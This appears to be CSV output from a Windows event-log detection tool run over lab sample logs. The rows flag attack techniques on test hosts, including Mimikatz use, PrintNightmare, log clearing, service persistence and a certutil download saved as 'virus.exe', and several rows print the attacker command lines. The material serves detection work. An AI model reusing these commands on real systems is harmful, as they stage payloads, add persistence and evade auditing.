2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx
2021-10-26 05:23:34.575 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"New-Service -Name ""hackervirus"" -BinaryPathName '""virus.exe""'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Service): ""New-Service"" ParameterBinding(New-Service): name=""Name""; value=""hackervirus"" ParameterBinding(New-Service): name=""BinaryPathName""; value=""""virus.exe""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""hackervirus""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
2021-10-26 05:23:34.736 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx
2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-31 23:28:15.330 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-LocalGroupMember -Name Administrators,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-LocalGroupMember): ""Get-LocalGroupMember"" ParameterBinding(Get-LocalGroupMember): name=""Name""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.351 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""JUMP01\Administrator"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Domain Admins"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Nessus Local Access"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\SG_LocalAdmin_Lab""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.353 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:28:15.354 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
2021-10-31 23:37:10.246 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
2021-10-31 23:37:10.247 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-ADGroupMember -Identity 'Administrators',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
2021-10-31 23:37:10.396 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-ADGroupMember): ""Get-ADGroupMember"" ParameterBinding(Get-ADGroupMember): name=""Identity""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
2021-10-31 23:37:10.398 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Nessus Local Access,OU=Security-groups,OU=OFFSEC-COMPANY,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Domain Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Enterprise Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Administrator,CN=Users,DC=offsec,DC=lan""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
2021-10-31 23:37:10.401 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
2021-10-31 23:37:10.402 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx
2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
